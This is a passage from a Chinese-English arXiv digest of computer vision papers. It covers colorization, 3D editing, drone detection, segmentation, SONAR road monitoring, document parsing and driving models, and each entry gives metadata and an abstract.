Abstract:3D Scene Graph (3DSG) generation plays a pivotal role in spatial understanding and semantic-affordance perception. However, its generalizability is often constrained by data scarcity. Current solutions primarily focus on cross-modal assisted representation learning and object-centric generation pre-training. The former relies heavily on predicate annotations, while the latter’s predicate learning may be bypassed due to strong object priors. Consequently, they could not often provide a label-free and robust self-supervised proxy task for 3DSG fine-tuning. To bridge this gap, we propose a Topological Layout Learning (ToLL) for 3DSG pretraining framework. In detail, we design an Anchor-Conditioned Topological Geometry Reasoning, with a GNN to recover the global layout of zero-centered subgraphs by the spatial priors from sparse anchors. This process is strictly modulated by predicate features, thereby enforcing the predicate relation learning. Furthermore, we construct a Structural Multi-view Augmentation to avoid semantic corruption, and enhancing representations via self-distillation. The extensive experiments on 3DSSG dataset demonstrate that our ToLL could improve representation quality, outperforming state-of-the-art baselines.
[CV-62] ColorFLUX: A Structure-Color Decoupling Framework for Old Photo Colorization CVPR26
【速读】:该论文旨在解决老照片(old photos)在颜色恢复过程中存在的准确性不足问题,其核心挑战源于老照片特有的退化特征(如亮度衰减和色相偏移),这些特征与现代照片分布存在显著域差距(domain gap),导致现有修复模型在色彩还原时效果不佳。解决方案的关键在于提出一种基于生成扩散模型FLUX的新型老照片着色框架,其中引入结构-色彩解耦策略(structure-color decoupling strategy),将结构保持与色彩恢复分离处理,从而在保留原始结构信息的同时实现精准色彩重建;同时结合渐进式直接偏好优化(progressive Direct Preference Optimization, Pro-DPO)机制,通过粗到细的颜色增强过渡学习细微色彩偏好,并引入视觉语义提示(visual semantic prompts)以提取老照片中细粒度语义信息,有效缓解因历史影像固有色彩偏差带来的失真问题。
链接: https://arxiv.org/abs/2603.28162
作者: Bingchen Li,Zhixin Wang,Fan Li,Jiaqi Xu,Jiaming Guo,Renjing Pei,Xin Li,Zhibo Chen
机构: University of Science and Technology of China(中国科学技术大学); Huawei Noah’s Ark Lab(华为诺亚方舟实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR26
Abstract:Old photos preserve invaluable historical memories, making their restoration and colorization highly desirable. While existing restoration models can address some degradation issues like denoising and scratch removal, they often struggle with accurate colorization. This limitation arises from the unique degradation inherent in old photos, such as faded brightness and altered color hues, which are different from modern photo distributions, creating a substantial domain gap during colorization. In this paper, we propose a novel old photo colorization framework based on the generative diffusion model FLUX. Our approach introduces a structure-color decoupling strategy that separates structure preservation from color restoration, enabling accurate colorization of old photos while maintaining structural consistency. We further enhance the model with a progressive Direct Preference Optimization (Pro-DPO) strategy, which allows the model to learn subtle color preferences through coarse-to-fine transitions in color augmentation. Additionally, we address the limitations of text-based prompts by introducing visual semantic prompts, which extract fine-grained semantic information directly from old photos, helping to eliminate the color bias inherent in old photos. Experimental results on both synthetic and real datasets demonstrate that our approach outperforms existing state-of-the-art colorization methods, including closed-source commercial models, producing high-quality and vivid colorization.
[CV-63] Event-Based Method for High-Speed 3D Deformation Measurement under Extreme Illumination Conditions
【速读】:该论文旨在解决传统相机在极端光照条件下难以准确测量大型工程结构(如航天发射塔和悬索桥)高速三维形变的问题,因其动态范围有限导致过曝。解决方案的关键在于提出一种基于多事件相机阵列的集成方法,利用事件相机(event camera)异步事件流特性与时间相关性分析提取标记点中心,并通过求解Kruppa方程结合参数优化实现快速标定,最终借助统一坐标变换与线性交会法完成高精度三维形变测量,实验表明相对误差低于0.1%,验证了其在恶劣光照环境下的有效性。
链接: https://arxiv.org/abs/2603.28159
作者: Banglei Guan,Yifei Bian,Zibin Liu,Haoyang Li,Xuanyu Bai,Taihang Lei,Bin Li,Yang Shang,Qifeng Yu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Exp Mech (2026)
Abstract:Background: Large engineering structures, such as space launch towers and suspension bridges, are subjected to extreme forces that cause high-speed 3D deformation and compromise safety. These structures typically operate under extreme illumination conditions. Traditional cameras often struggle to handle strong light intensity, leading to overexposure due to their limited dynamic range. Objective: Event cameras have emerged as a compelling alternative to traditional cameras in high dynamic range and low-latency applications. This paper presents an integrated method, from calibration to measurement, using a multi-event camera array for high-speed 3D deformation monitoring of structures in extreme illumination conditions. Methods: Firstly, the proposed method combines the characteristics of the asynchronous event stream and temporal correlation analysis to extract the corresponding marker center point. Subsequently, the method achieves rapid calibration by solving the Kruppa equations in conjunction with a parameter optimization framework. Finally, by employing a unified coordinate transformation and linear intersection, the method enables the measurement of 3D deformation of the target structure. Results: Experiments confirmed that the relative measurement error is below 0.08%. Field experiments under extreme illumination conditions, including self-calibration of a multi-event camera array and 3D deformation measurement, verified the performance of the proposed method. Conclusions: This paper addressed the critical limitation of traditional cameras in measuring high-speed 3D deformations under extreme illumination conditions. The experimental results demonstrate that, compared to other methods, the proposed method can accurately measure 3D deformations of structures under harsh lighting conditions, and the relative error of the measured deformation is less than 0.1%. Comments: Exp Mech (2026) Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.28159 [cs.CV] (or arXiv:2603.28159v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.28159 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Related DOI: https://doi.org/10.1007/s11340-026-01286-2 Focus to learn more DOI(s) linking to related resources Submission history From: Yifei Bian [view email] [v1] Mon, 30 Mar 2026 08:25:09 UTC (621 KB) Full-text links: Access Paper: View a PDF of the paper titled Event-Based Method for High-Speed 3D Deformation Measurement under Extreme Illumination Conditions, by Banglei Guan and 8 other authorsView PDFHTML (experimental)TeX Source view license Current browse context: cs.CV prev | next new | recent | 2026-03 Change to browse by: cs References Citations NASA ADSGoogle Scholar Semantic Scholar export BibTeX citation Loading… BibTeX formatted citation loading… Data provided by: Bookmark checked=“checked”> Bibliographic Tools Bibliographic and Citation Tools Bibliographic Explorer Toggle Bibliographic Explorer (What is the Explorer?) Connected Papers Toggle Connected Papers (What is Connected Papers?) Litmaps Toggle Litmaps (What is Litmaps?) scite.ai Toggle scite Smart Citations (What are Smart Citations?) Code, Data, Media Code, Data and Media Associated with this Article alphaXiv Toggle alphaXiv (What is alphaXiv?) Links to Code Toggle CatalyzeX Code Finder for Papers (What is CatalyzeX?) DagsHub Toggle DagsHub (What is DagsHub?) GotitPub Toggle Gotit.pub (What is GotitPub?) Huggingface Toggle Hugging Face (What is Huggingface?) Links to Code Toggle Papers with Code (What is Papers with Code?) ScienceCast Toggle ScienceCast (What is ScienceCast?) Demos Demos Replicate Toggle Replicate (What is Replicate?) Spaces Toggle Hugging Face Spaces (What is Spaces?) Spaces Toggle TXYZ.AI (What is TXYZ.AI?) Related Papers Recommenders and Search Tools Link to Influence Flower Influence Flower (What are Influence Flowers?) Core recommender toggle CORE Recommender (What is CORE?) Author Venue Institution Topic About arXivLabs arXivLabs: experimental projects with community collaborators arXivLabs is a framework that allows collaborators to develop and share new arXiv features directly on our website. Both individuals and organizations that work with arXivLabs have embraced and accepted our values of openness, community, excellence, and user data privacy. arXiv is committed to these values and only works with partners that adhere to them. Have an idea for a project that will add value for arXiv’s community? Learn more about arXivLabs. Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) mathjaxToggle(); About Help contact arXivClick here to contact arXiv Contact subscribe to arXiv mailingsClick here to subscribe Subscribe Copyright Privacy Policy Web Accessibility Assistance arXiv Operational Status
[CV-64] ObjectMorpher: 3D-Aware Image Editing via Deformable 3DGS Models
【速读】:该论文旨在解决图像编辑中缺乏精确的物体级控制问题,现有2D方法因缺乏3D感知常导致结果模糊或不真实,而现有3D-aware方法则依赖复杂的优化或不完整的单目重建。其解决方案的关键在于提出一个统一且交互式的框架ObjectMorpher,通过图像到3D生成器将目标实例提升为可编辑的3D高斯溅射(3D Gaussian Splatting, 3DGS)表示,从而实现基于几何约束的快速、保身份的操作;用户通过拖拽控制点触发基于图结构的非刚性形变(采用尽可能刚性(as-rigid-as-possible, ARAP)约束),确保形状与姿态变化符合物理合理性,并结合复合扩散模块协调光照、色彩和边界以实现无缝重融合,显著提升了编辑的精细度、真实感及可控性。
链接: https://arxiv.org/abs/2603.28152
作者: Yuhuan Xie,Aoxuan Pan,Yi-Hua Huang,Chirui Chang,Peng Dai,Xin Yu,Xiaojuan Qi
机构: The University of Hong Kong (香港大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 11 pages, 8 figures
Abstract:Achieving precise, object-level control in image editing remains challenging: 2D methods lack 3D awareness and often yield ambiguous or implausible results, while existing 3D-aware approaches rely on heavy optimization or incomplete monocular reconstructions. We present ObjectMorpher, a unified, interactive framework that converts ambiguous 2D edits into geometry-grounded operations. ObjectMorpher lifts target instances with an image-to-3D generator into editable 3D Gaussian Splatting (3DGS), enabling fast, identity-preserving manipulation. Users drag control points; a graph-based non-rigid deformation with as-rigid-as-possible (ARAP) constraints ensures physically sensible shape and pose changes. A composite diffusion module harmonizes lighting, color, and boundaries for seamless reintegration. Across diverse categories, ObjectMorpher delivers fine-grained, photorealistic edits with superior controllability and efficiency, outperforming 2D drag and 3D-aware baselines on KID, LPIPS, SIFID, and user preference.
[CV-65] BlankSkip: Early-exit Object Detection onboard Nano-drones CVPR
【速读】:该论文旨在解决在资源受限的纳米无人机(nano-sized drones)上部署轻量级目标检测(Object Detection, OD)模型时面临的计算约束问题,即如何在有限的内存(约10 MiB)和功耗(1 W)条件下实现高效的目标检测。解决方案的关键在于提出一种名为BlankSkip的自适应网络架构,其通过引入一个简单的辅助分类任务(auxiliary classification task)来实现早期退出机制——当输入帧中无感兴趣目标时,网络可提前终止推理流程,从而显著降低平均推理延迟。实验表明,在真实纳米无人机平台Bitcraze Crazyflie 2.1上,该方法相较静态MobileNet-SSD模型实现了最高24%的吞吐量提升,且仅带来0.015的mAP性能下降。
链接: https://arxiv.org/abs/2603.28149
作者: Carlo Marra,Beatrice Alessandra Motetti,Alessio Burrello,Enrico Macii,Massimo Poncino,Daniele Jahier Pagliari
机构: Politecnico di Torino (都灵理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted for publication in the Embedded Vision Workshop of the 2026 Computer Vision and Pattern Recognition (CVPR) conference
Abstract:Deploying tiny computer vision Deep Neural Networks (DNNs) on-board nano-sized drones is key for achieving autonomy, but is complicated by the extremely tight constraints of their computational platforms (approximately 10 MiB memory, 1 W power budget). Early-exit adaptive DNNs that dial down the computational effort for “easy-to-process” input frames represent a promising way to reduce the average inference latency. However, while this approach is extensively studied for classification, its application to dense tasks like object detection (OD) is not straightforward. In this paper, we propose BlankSkip, an adaptive network for on-device OD that leverages a simple auxiliary classification task for early exit, i.e., identifying frames with no objects of interest. With experiments using a real-world nano-drone platform, the Bitcraze Crazyflie 2.1, we achieve up to 24% average throughput improvement with a limited 0.015 mean Average Precision (mAP) drop compared to a static MobileNet-SSD detector, on a state-of-the-art nano-drones OD dataset.
[CV-66] RecycleLoRA: Rank-Revealing QR-Based Dual-LoRA Subspace Adaptation for Domain Generalized Semantic Segmentation CVPR2026
【速读】:该论文旨在解决领域泛化语义分割(Domain Generalized Semantic Segmentation, DGSS)中模型在未见目标域上性能下降的问题,特别是针对视觉基础模型(Vision Foundation Models, VFMs)中潜在子空间结构未被充分挖掘、以及LoRA组件表示多样性不足与参数利用效率低下的挑战。解决方案的关键在于提出RecycleLoRA框架,其核心创新是采用Rank-Revealing QR分解(RRQR)系统性地解析VFMs的子空间结构,从而指导主适配器(main adapter)学习由RRQR识别出的次要子空间方向上的多样化且独立的特征表示,同时引入次级适配器(sub adapter)对主要方向进行轻量级微调以提供互补优化。这种双适配器设计无需额外正则化损失即可实现差异化的表征学习,并通过RRQR初始化显著提升领域泛化能力,在合成到真实和真实到真实场景下均达到当前最优性能,且不增加推理延迟。
链接: https://arxiv.org/abs/2603.28142
作者: Chanseul Cho,Seokju Yun,Jeaseong Jeon,Seungjae Moon,Youngmin Ro
机构: University of Seoul (首尔大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted to CVPR 2026 (Findings)
Abstract:Domain Generalized Semantic Segmentation (DGSS) aims to maintain robust performance across unseen target domains. Vision Foundation Models (VFMs) offer rich multi-domain knowledge that can enhance generalization. However, strategies for actively exploiting the rich subspace structures within VFMs remain under-explored, with many existing methods focusing primarily on preserving pre-trained knowledge. Furthermore, their LoRA components often suffer from limited representational diversity and inefficient parameter utilization. We propose RecycleLoRA, which addresses both challenges by employing Rank-Revealing QR Decomposition (RRQR) to systematically exploit VFM’s subspace structures and enhance LoRA’s representational richness. Our main adapter leverages minor subspace directions identified by RRQR to learn diverse and independent features, achieving competitive performance even when used alone. We further introduce a sub adapter that carefully refines major directions with minimal adjustments, providing complementary improvements to the main adapter’s strong baseline performance. This design enables the dual adapters to learn distinct representations without requiring additional regularization losses. Our systematic exploitation of pre-trained subspace structures through RRQR-based initialization leads to superior domain generalization performance. RecycleLoRA achieves state-of-the-art performance on both synthetic-to-real generalization and real-to-real generalization tasks without complex architectures or additional inference latency.
[CV-67] Intelligent Road Condition Monitoring using 3D In-Air SONAR Sensing
【速读】:该论文旨在解决道路表面状况监测问题,特别是在恶劣环境条件下(如大雨、烟雾或雾霾)传统传感器(如摄像头和激光雷达)性能下降的问题。研究提出利用空气中三维声纳(in-air 3D SONAR)传感器作为鲁棒的感知模态,实现道路材料分类与道路损伤检测与分类两个任务。解决方案的关键在于:首先构建一个统一标注的数据集,涵盖不同类型的路面损伤及材料标签;其次通过单个SONAR传感器数据完成两类任务——材料分类(沥青、混凝土和元素路)准确率接近90% F1分数,而损伤检测准确率约为75% F1分数,表明SONAR在复杂环境下具备良好适用性,可集成进基于机会感知(opportunistic sensing)的道路养护管理系统,但需进一步提升损伤识别精度以满足实际应用需求。
链接: https://arxiv.org/abs/2603.28141
作者: Amber Cassimon,Robin Kerstens,Walter Daems,Jan Steckel
机构: University of Antwerp (安特卫普大学); Flanders Make Strategic Research Centre (弗拉芒制造战略研究中心)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 10 pages, 9 figures, 2 tables
Abstract:In this paper, we investigate the capabilities of in-air 3D SONAR sensors for the monitoring of road surface conditions. Concretely, we consider two applications: Road material classification and Road damage detection and classification. While such tasks can be performed with other sensor modalities, such as camera sensors and LiDAR sensors, these sensor modalities tend to fail in harsh sensing conditions, such as heavy rain, smoke or fog. By using a sensing modality that is robust to such interference, we enable the creation of opportunistic sensing applications, where vehicles performing other tasks (garbage collection, mail delivery, etc.) can also be used to monitor the condition of the road. For these tasks, we use a single dataset, in which different types of damages are annotated, with labels including the material of the road surface. In the material classification task, we differentiate between three different road materials: Asphalt, Concrete and Element roads. In the damage detection and classification task, we determine if there is damage, and what type of damage (independent of material type), without localizing the damage. We are succesful in determining the road surface type from SONAR sensor data, with F1 scores approaching 90% on the test set, but find that for the detection of damages performace lags, with F1 score around 75%. From this, we conclude that SONAR sensing is a promising modality to include in opportunistic sensing-based pavement management systems, but that further research is needed to reach the desired accuracy.
[CV-68] Robust Remote Sensing Image-Text Retrieval with Noisy Correspondence
【速读】:该论文针对遥感图像-文本检索(Remote Sensing Image-Text Retrieval, RSITR)中普遍存在的“噪声对应关系”(Noisy Correspondence, NC)问题展开研究,即现有方法通常假设图像与文本描述完全对齐,但在实际数据集中存在大量不准确或错配的样本对,导致模型性能下降。解决方案的关键在于提出一种鲁棒的遥感图像-文本检索(Robust Remote Sensing Image-Text Retrieval, RRSITR)范式,其核心创新是引入自 paced learning(自适应学习策略),模拟人类认知从易到难的学习过程:首先根据每对样本的损失值将训练数据分为三类(干净、模糊、噪声样本),并通过动态加权机制估计各对样本的可靠性;进一步设计多模态自 paced 函数以动态调节训练顺序和权重,实现渐进式学习;最后,针对噪声样本对提出一种基于语义相似度动态调整软边距的鲁棒三元组损失函数,从而显著提升模型在高噪声率场景下的鲁棒性与性能。
链接: https://arxiv.org/abs/2603.28134
作者: Qiya Song,Yiqiang Xie,Yuan Sun,Renwei Dian,Xudong Kang
机构: Hunan Normal University (湖南师范大学); Sichuan University (四川大学); Hunan University (湖南大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:As a pivotal task that bridges remote visual and linguistic understanding, Remote Sensing Image-Text Retrieval (RSITR) has attracted considerable research interest in recent years. However, almost all RSITR methods implicitly assume that image-text pairs are matched perfectly. In practice, acquiring a large set of well-aligned data pairs is often prohibitively expensive or even infeasible. In addition, we also notice that the remote sensing datasets (e.g., RSITMD) truly contain some inaccurate or mismatched image text descriptions. Based on the above observations, we reveal an important but untouched problem in RSITR, i.e., Noisy Correspondence (NC). To overcome these challenges, we propose a novel Robust Remote Sensing Image-Text Retrieval (RRSITR) paradigm that designs a self-paced learning strategy to mimic human cognitive learning patterns, thereby learning from easy to hard from multi-modal data with NC. Specifically, we first divide all training sample pairs into three categories based on the loss magnitude of each pair, i.e., clean sample pairs, ambiguous sample pairs, and noisy sample pairs. Then, we respectively estimate the reliability of each training pair by assigning a weight to each pair based on the values of the loss. Further, we respectively design a new multi-modal self-paced function to dynamically regulate the training sequence and weights of the samples, thus establishing a progressive learning process. Finally, for noisy sample pairs, we present a robust triplet loss to dynamically adjust the soft margin based on semantic similarity, thereby enhancing the robustness against noise. Extensive experiments on three popular benchmark datasets demonstrate that the proposed RRSITR significantly outperforms the state-of-the-art methods, especially in high noise rates. The code is available at: this https URL
[CV-69] MDPBench: A Benchmark for Multilingual Document Parsing in Real-World Scenarios
【速读】:该论文旨在解决多语言文档解析(Document Parsing)领域缺乏系统性评估基准的问题,尤其是在非拉丁语系、低资源语言以及真实拍摄文档上的性能表现未被充分研究。现有模型大多仅在高质量数字文档上训练和测试,无法反映实际应用场景中的多样性与挑战。解决方案的关键在于构建首个多语言文档解析基准(Multilingual Document Parsing Benchmark, MDPBench),包含3,400张跨17种语言、多种书写系统及不同拍摄条件的文档图像,并通过专家模型标注、人工校正与人工验证的严格流程确保标注质量;同时划分公开与私有测试集以防止数据泄露并保障公平比较。实验表明,闭源模型(如Gemini 3-Pro)表现稳健,而开源模型在非拉丁语系和拍摄文档上性能显著下降(平均下降17.8%和14.0%),揭示了当前模型在多语言场景下的不平衡问题,并为开发更具包容性和部署可行性的文档解析系统指明方向。
链接: https://arxiv.org/abs/2603.28130
作者: Zhang Li,Zhibo Lin,Qiang Liu,Ziyang Zhang,Shuo Zhang,Zidun Guo,Jiajun Song,Jiarui Zhang,Xiang Bai,Yuliang Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We introduce Multilingual Document Parsing Benchmark, the first benchmark for multilingual digital and photographed document parsing. Document parsing has made remarkable strides, yet almost exclusively on clean, digital, well-formatted pages in a handful of dominant languages. No systematic benchmark exists to evaluate how models perform on digital and photographed documents across diverse scripts and low-resource languages. MDPBench comprises 3,400 document images spanning 17 languages, diverse scripts, and varied photographic conditions, with high-quality annotations produced through a rigorous pipeline of expert model labeling, manual correction, and human verification. To ensure fair comparison and prevent data leakage, we maintain separate public and private evaluation splits. Our comprehensive evaluation of both open-source and closed-source models uncovers a striking finding: while closed-source models (notably Gemini3-Pro) prove relatively robust, open-source alternatives suffer dramatic performance collapse, particularly on non-Latin scripts and real-world photographed documents, with an average drop of 17.8% on photographed documents and 14.0% on non-Latin scripts. These results reveal significant performance imbalances across languages and conditions, and point to concrete directions for building more inclusive, deployment-ready parsing systems. Source available at this https URL.
[CV-70] SVGS: Single-View to 3D Object Editing via Gaussian Splatting
【速读】:该论文旨在解决文本驱动的3D场景编辑中存在的一致性差与效率低的问题。现有方法依赖隐式3D表示(如NeRF)时,虽能渲染复杂场景但处理速度慢且难以精确控制特定区域;而基于多视角编辑策略的方法(如Instruct-NeRF2NeRF和GaussianEditor)在执行文本指令时易导致不同视图间结果不一致,影响整体编辑质量与效率平衡。其解决方案的关键在于提出一种基于3D高斯点绘(3D Gaussian Splatting, 3DGS)的单视角文本驱动编辑方法SVGS(Single-View to 3D Object Editing via Gaussian Splatting),通过引入基于多视角扩散模型的单视角编辑策略,仅利用产生一致编辑结果的视图重建3D场景,并采用稀疏3D高斯点绘作为表示形式,显著提升编辑效率与一致性。
链接: https://arxiv.org/abs/2603.28126
作者: Pengcheng Xue,Yan Tian,Qiutao Song,Ziyi Wang,Linyang He,Weiping Ding,Mahmoud Hassaballah,Karen Egiazarian,Wei-Fa Yang,Leszek Rutkowski
机构: Zhejiang Gongshang University (浙江工商大学); Jianpei Technology Co., Ltd. (简佩科技有限公司); Nantong University (南通大学); Prince Sattam Bin Abdulaziz University (萨特姆·本·阿卜杜拉兹大学); Qena University (盖纳大学); Tampere University (坦佩雷大学); The University of Hong Kong (香港大学); Polish Academy of Sciences (波兰科学院); AGH University of Krakow (克拉科夫AGH科技大学); SAN University (桑大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Text-driven 3D scene editing has attracted considerable interest due to its convenience and user-friendliness. However, methods that rely on implicit 3D representations, such as Neural Radiance Fields (NeRF), while effective in rendering complex scenes, are hindered by slow processing speeds and limited control over specific regions of the scene. Moreover, existing approaches, including Instruct-NeRF2NeRF and GaussianEditor, which utilize multi-view editing strategies, frequently produce inconsistent results across different views when executing text instructions. This inconsistency can adversely affect the overall performance of the model, complicating the task of balancing the consistency of editing results with editing efficiency. To address these challenges, we propose a novel method termed Single-View to 3D Object Editing via Gaussian Splatting (SVGS), which is a single-view text-driven editing technique based on 3D Gaussian Splatting (3DGS). Specifically, in response to text instructions, we introduce a single-view editing strategy grounded in multi-view diffusion models, which reconstructs 3D scenes by leveraging only those views that yield consistent editing results. Additionally, we employ sparse 3D Gaussian Splatting as the 3D representation, which significantly enhances editing efficiency. We conducted a comparative analysis of SVGS against existing baseline methods across various scene settings, and the results indicate that SVGS outperforms its counterparts in both editing capability and processing speed, representing a significant advancement in 3D editing technology. For further details, please visit our project page at: this https URL.
[CV-71] MedLoc-R1: Performance-Aware Curriculum Reward Scheduling for GRPO-Based Medical Visual Grounding CVPR
【速读】:该论文旨在解决生成式 AI (Generative AI) 在医学视觉定位(Medical Visual Grounding)任务中,因奖励稀疏性导致策略梯度消失和训练停滞的问题。现有基于强化学习(Reinforcement Learning, RL)的方法如 Group Relative Policy Optimization (GRPO) 在处理医学图像时,由于目标区域小或模糊,加之固定 IoU(Intersection over Union)奖励机制刚性且不适应模型进展,难以有效优化。其解决方案的关键在于提出 MedLoc-R1——一个性能感知的奖励调度框架,通过滑动窗口性能追踪器与多条件更新规则,动态调整奖励标准:从初期宽松、易获取的密集奖励信号逐步过渡到后期严格的细粒度定位要求,从而在不引入额外网络或梯度路径的前提下,显著提升定位精度与训练稳定性。
链接: https://arxiv.org/abs/2603.28120
作者: Guangjing Yang,Ziyuan Qin,Chaoran Zhang,Chenlin Du,Jinlin Wang,Wanran Sun,Zhenyu Zhang,Bing Ji,Qicheng Lao
机构: Beijing University of Posts and Telecommunications (北京邮电大学); Emory University (埃默里大学); Peking University (北京大学); Shandong University (山东大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 2026 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)
Abstract:Medical visual grounding serves as a crucial foundation for fine-grained multimodal reasoning and interpretable clinical decision support. Despite recent advances in reinforcement learning (RL) for grounding tasks, existing approaches such as Group Relative Policy Optimization~(GRPO) suffer from severe reward sparsity when directly applied to medical images, primarily due to the inherent difficulty of localizing small or ambiguous regions of interest, which is further exacerbated by the rigid and suboptimal nature of fixed IoU-based reward schemes in RL. This leads to vanishing policy gradients and stagnated optimization, particularly during early training. To address this challenge, we propose MedLoc-R1, a performance-aware reward scheduling framework that progressively tightens the reward criterion in accordance with model readiness. MedLoc-R1 introduces a sliding-window performance tracker and a multi-condition update rule that automatically adjust the reward schedule from dense, easily obtainable signals to stricter, fine-grained localization requirements, while preserving the favorable properties of GRPO without introducing auxiliary networks or additional gradient paths. Experiments on three medical visual grounding benchmarks demonstrate that MedLoc-R1 consistently improves both localization accuracy and training stability over GRPO-based baselines. Our framework offers a general, lightweight, and effective solution for RL-based grounding in high-stakes medical applications. Code \ checkpoints are available at \hyperlinkthis https URL.
[CV-72] AutoDrivetext-P3: Unified Chain of Perception-Prediction-Planning Thought via Reinforcement Fine-Tuning ICLR2026
【速读】:该论文旨在解决当前基于视觉-语言模型(Vision-Language Models, VLMs)的自动驾驶系统中存在的两大问题:一是部分VLM直接输出规划结果而缺乏链式思维(Chain-of-Thought, CoT)推理,跳过了感知与预测阶段,导致领域差距显著并削弱决策能力;二是另一些VLM虽能分别生成感知、预测和规划输出,但模块间采用碎片化决策方式,缺乏协同效应,难以实现真正高效的规划性能。解决方案的关键在于提出AutoDrive-P³框架,通过结构化推理将感知(Perception)、预测(Prediction)和规划(Planning)三者有机整合,并引入P³-CoT数据集以支持连贯推理,同时设计P³-GRPO算法——一种分层强化学习方法,在三个任务上提供渐进式监督,使模型逐步生成CoT推理路径,从而提升安全性与可解释性。此外,还引入双思考模式(详细思考与快速思考)以平衡效率与性能。
链接: https://arxiv.org/abs/2603.28116
作者: Yuqi Ye,Zijian Zhang,Junhong Lin,Shangkun Sun,Changhao Peng,Wei Gao
机构: Peking University (北京大学)
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at ICLR 2026 (International Conference on Learning Representations)
Abstract:Vision-language models (VLMs) are increasingly being adopted for end-to-end autonomous driving systems due to their exceptional performance in handling long-tail scenarios. However, current VLM-based approaches suffer from two major limitations: 1) Some VLMs directly output planning results without chain-of-thought (CoT) reasoning, bypassing crucial perception and prediction stages which creates a significant domain gap and compromises decision-making capability; 2) Other VLMs can generate outputs for perception, prediction, and planning tasks but employ a fragmented decision-making approach where these modules operate separately, leading to a significant lack of synergy that undermines true planning performance. To address these limitations, we propose AutoDrive\text-P^3 , a novel framework that seamlessly integrates \textbfP erception, \textbfP rediction, and \textbfP lanning through structured reasoning. We introduce the P^3\text-CoT dataset to facilitate coherent reasoning and propose P^3\text-GRPO , a hierarchical reinforcement learning algorithm that provides progressive supervision across all three tasks. Specifically, AutoDrive\text-P^3 progressively generates CoT reasoning and answers for perception, prediction, and planning, where perception provides essential information for subsequent prediction and planning, while both perception and prediction collectively contribute to the final planning decisions, enabling safer and more interpretable autonomous driving. Additionally, to balance inference efficiency with performance, we introduce dual thinking modes: detailed thinking and fast thinking. Extensive experiments on both open-loop (nuScenes) and closed-loop (NAVSIMv1/v2) benchmarks demonstrate that our approach achieves state-of-the-art performance in planning tasks. Code is available at this https URL.
[CV-73] Attention Frequency Modulation: Training-Free Spectral Modulation of Diffusion Cross-Attention
【速读】:该论文旨在解决文本条件潜在扩散模型中交叉注意力(cross-attention)的逐步多分辨率动态机制缺乏系统刻画的问题,从而限制了无需训练即可实现可控生成的能力。其核心解决方案是提出Attention Frequency Modulation (AFM),关键在于将交叉注意力建模为潜空间网格上的时空信号,通过汇总token-softmax权重生成与token无关的集中度图,并追踪去噪过程中径向分箱傅里叶功率的变化;在此基础上,AFM在推理阶段对预softmax交叉注意力logits进行傅里叶域编辑,利用与去噪进度对齐的低频和高频带重加权策略,并以token分配熵自适应地门控这些频率编辑,从而在不重新训练、不修改提示词或更新参数的前提下,连续调节token竞争模式的空间尺度,实现可靠的视觉编辑并保持语义一致性。
链接: https://arxiv.org/abs/2603.28114
作者: Seunghun Oh,Unsang Park
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 16 pages; preprint
Abstract:Cross-attention is the primary interface through which text conditions latent diffusion models, yet its step-wise multi-resolution dynamics remain under-characterized, limiting principled training-free control. We cast diffusion cross-attention as a spatiotemporal signal on the latent grid by summarizing token-softmax weights into token-agnostic concentration maps and tracking their radially binned Fourier power over denoising. Across prompts and seeds, encoder cross-attention exhibits a consistent coarse-to-fine spectral progression, yielding a stable time-frequency fingerprint of token competition. Building on this structure, we introduce Attention Frequency Modulation (AFM), a plug-and-play inference-time intervention that edits token-wise pre-softmax cross-attention logits in the Fourier domain: low- and high-frequency bands are reweighted with a progress-aligned schedule and can be adaptively gated by token-allocation entropy, before the token softmax. AFM provides a continuous handle to bias the spatial scale of token-competition patterns without retraining, prompt editing, or parameter updates. Experiments on Stable Diffusion show that AFM reliably redistributes attention spectra and produces substantial visual edits while largely preserving semantic alignment. Finally, we find that entropy mainly acts as an adaptive gain on the same frequency-based edit rather than an independent control axis.
[CV-74] Contour-Guided Query-Based Feature Fusion for Boundary-Aware and Generalizable Cardiac Ultrasound Segmentation
【速读】:该论文旨在解决心脏超声图像分割中因低对比度、斑点噪声、边界不规则及设备与人群间域偏移导致的边界精度不足和结构一致性差的问题(即:准确的心脏超声分割对于智能医疗系统中心室功能评估至关重要,但现有基于外观驱动的学习方法在上述挑战下难以保持边界清晰性和结构一致性)。其解决方案的关键在于提出一种轮廓引导查询精化网络(Contour-Guided Query Refinement Network, CGQR-Net),通过融合多分辨率特征表示与由轮廓提取的结构先验信息实现边界感知分割:首先利用HRNet骨干网络保留高分辨率空间细节并捕获多尺度上下文;随后生成粗略分割结果,从中提取解剖轮廓并编码为可学习的查询嵌入;这些轮廓引导的查询通过交叉注意力机制与融合特征图交互,实现结构感知的精化过程,从而提升边界刻画能力并抑制噪声伪影;此外,采用双头监督策略联合优化分割与边界预测,以强化结构一致性。
链接: https://arxiv.org/abs/2603.28110
作者: Zahid Ullah,Sieun Choi,Jihie Kim
机构: Dongguk University (东国大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
